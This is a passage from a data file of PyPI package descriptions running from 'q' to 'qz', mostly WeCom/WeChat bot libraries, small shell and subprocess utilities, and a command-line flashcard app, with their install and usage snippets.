"Python\u5de5\u5177\u5305\u5b89\u88c5\u65b9\u5f0f\u4e0b\u8f7d\u6b64\u9879\u76ee\uff0c\u8fdb\u5165\u9879\u76ee\u6839\u76ee\u5f55\uff0c\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u5b89\u88c5\uff1apythonsetup.pyinstall\u4f7f\u7528pip\u8fdb\u884c\u5b89\u88c5pipinstallqytPython\u9002\u7528\u5e73\u53f0LinuxWindowsPython\u7248\u672c\u8981\u6c42\u5927\u4e8e\u7b49\u4e8epython 3.6\u7248\u672c\u4fe1\u606f\u5f53\u524d\u7248\u672c\uff08\u589e\u52a0ZIP\u89e3\u538b\uff0c\u589e\u52a0ftp\u4e0b\u8f7d\uff09\uff1av0.0.3\u5386\u53f2\u7248\u672c0.0.1 : \u57fa\u7840\u7248\u672c\u4f7f\u7528\u6587\u6863git\u5730\u5740\uff1ahttps://github.com/q759729997/qytPython\u5de5\u5177\u7c7b\u4f7f\u7528\u624b\u518c-readme_tools.md\u81f4\u8c22\u5f00\u6e90\u9879\u76ee\uff1ahttps://github.com/fastnlp/fastNLP"} +{"package": "qywechat", "pacakge-description": "QyWechatThis is a msg-robot forqywechatInstallpython -m pip install qywechatGetting Startedsend text msgimport qywechat\nkey = \"b8cxxx\"\nbot = qywechat.Bot(key)\ndata = {\n \t\"msgtype\": \"text\",\n \t\"text\": {\n \t\"content\": \"hello world\"\n \t}\n }\n# @ user, all user\n# data = {\n# \"msgtype\": \"text\",\n# \"text\": {\n# \"content\": \"LiuKeTest Msg\",\n#\t\t\"mentioned_list\":[\"liuke\",\"@all\"],\n#\t\t\"mentioned_mobile_list\":[\"13800001111\",\"@all\"]\n# }\n#}\nbot.send_msg(data)send markdown msgdata = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"content\": \"\u5b9e\u65f6\u65b0\u589e\u7528\u6237\u53cd\u9988132\u4f8b\uff0c\u8bf7\u76f8\u5173\u540c\u4e8b\u6ce8\u610f\u3002\\n\n >\u7c7b\u578b:\u7528\u6237\u53cd\u9988\n >\u666e\u901a\u7528\u6237\u53cd\u9988:117\u4f8b\n >VIP\u7528\u6237\u53cd\u9988:15\u4f8b\"\n }\n}send imagebot.img_msg(\"path/test.jpg\")send filemedia_id = bot.upload_file(\"path/liuke.zip\")\ndata = {\n \"msgtype\": \"file\",\n \"file\": {\n \t\t\"media_id\": media_id\n }\n}\nbot.send_msg(data)send image & text msgdata = {\n \"msgtype\": \"news\",\n \"news\": {\n \"articles\" : [\n {\n \"title\" : \"LiuKeTest\",\n \"description\" : \"qywechat\",\n \"url\" : \"https://xxx\",\n \"picurl\" : \"http://xxx.png\"\n }\n ]\n }\n}\nbot.send_msg(data)FeaturesSupport all types messageSupport send imageSupport upload fileContributingContributions are welcome.If you've found a bug within this project, please open an issue to discuss what you would like to change.If it's an issue with the API, please report any new issues atqywechat issues"} +{"package": "qyweixin", "pacakge-description": "qyweixinEnterprise weixin, interface.Usageget token>>>importqyweixin>>>token=qyweixin.get_token('corpid','corpsecret')>>>token...push message>>>importqyweixin>>>push_msg=qyweixin.WeixinPush()>>>push_msg.push_text_msg(token=token,agentid=0,content='test msg',touser='test',toparty='test_group',totag='',safe=0)Trueupload files>>>importqyweixin>>>media_id=qyweixin.upload(token,filename,filepath,filetype)...Featurespush messagesuploads mediamanage mediamore qyweixin apiInstallationTo install qyweixin, simply:$pipinstallqyweixinNoticeThis package on v0.3.0 has one broken api. When the message fails to send, the details are returned.LicenseCopyright (C) 2015-2017 TaoBeierHISTORY2015.09.27 Start2015.10.08 Add file upload2015.11.19 Simple API2016.11.22 Upgrade to 0.2.2 improve push_message API"} +{"package": "qywx-app-message", "pacakge-description": "https://github.com/not-know/qywx_app_message"} +{"package": "qz", "pacakge-description": "No description available on PyPI."} +{"package": "qz7_hello", "pacakge-description": "No description available on PyPI."} +{"package": "qz7.shell", "pacakge-description": "qz7.shellConstruct and execute shell command lists locally or remotely via ssh.qz7.shell is library for easily creating and executing command lists.\nA command list is a list of simple commands that are executed\nby an underlying shell."} +{"package": "qz7.subprocess-w", "pacakge-description": "qz7.subprocess_wA Popen wrapper for graceful process terminationThis package provides a Popen wrapper class\ncalled PopenW that termimates subprocess cleanly,\ninstead of leaving zombie or orphan processes\nwhen the parent process raises an unexpected exception."} +{"package": "qz7.term-signals", "pacakge-description": "qz7.term_signalsFunctions for gracefully handling important term signals."} +{"package": "qz-doudizhu", "pacakge-description": "Python \u6597\u5730\u4e3b\u8fd8\u6ca1\u5b8c\u6210\uff0c\u4f46\u53ef\u4ee5\u8fd0\u884c\u4e86"} +{"package": "qzhub-core", "pacakge-description": "No description available on PyPI."} +{"package": "qzig", "pacakge-description": "No description available on PyPI."} +{"package": "qzlt", "pacakge-description": "qzltAQuizletclone for the command line.Built WithPythonTyperPoetry(back to top)InstallationPyPIpip install qzltFrom sourceWithPoetryinstalled, rungit clone https://github.com/calvincheng/qzlt.git\ncd qzlt\npoetry shell\npoetry install(back to top)UsageQuick startLet's create a new set to start learning some common Chinese vocabulary. Runquiz sets createTitle: chinese\nDescription: Common expressions in Chineseand follow the prompts to give your set a title and a description.You can see that the newly created set exists by listing all sets viaquiz sets listTITLE DESCRIPTION\nchinese Common expressions in ChineseBy default, new sets are empty when created. Let's change that by adding some cards. Runquiz set add chineseYou'll be prompted to start giving your card a term and a definition.Term: \u4f60\u597d\nDefinition: Hello\nCard addedAdd as many cards as you want. When you're done, pressctrl-Cto exit.To see all the cards you've just added, runquiz set list chineseTERM DEFINITION\n[0] \u4f60\u597d Hello\n[1] \u518d\u898b Goodbye\n[2] \u958b\u5fc3 Happy\n[3] \u50b7\u5fc3 Sad\n[4] \u860b\u679c Apple\n[5] \u9999\u8549 BananaYou're all set! To study your new set, runquiz study chineseTo see all the study modes available, runquiz study --helpCommandsUsage: quiz [OPTIONS] COMMAND [ARGS]...\n\nOptions:\n --install-completion Install completion for the current shell.\n --show-completion Show completion for the current shell, to copy it or\n customize the installation.\n --help Show this message and exit.\n\nCommands:\n set Manage an individual set\n sets Manage all sets\n study Begin a study session(back to top)RoadmapImport from AnkiCollect and display statistics (review heatmap, streaks, etc.)Add config file to customise experience (e.g. shuffle by default)Smarter corrections (e.g. allow answers from either grammatical gender: professeur\u2022e)Markdown support for cardsIncorporate TTSResume interrupted sessions(back to top)LicenseDistributed under theMIT License.(back to top)ContactCalvin Cheng -calvin.cc.cheng@gmail.comProject Link:https://github.com/calvincheng/qzlt(back to top)"} +{"package": "qzonesecret", "pacakge-description": "Find secrets in Qzone of any QQ."} +{"package": "qztest", "pacakge-description": "No description available on PyPI."} +{"package": "qz-testpypi", "pacakge-description": "No description available on PyPI."}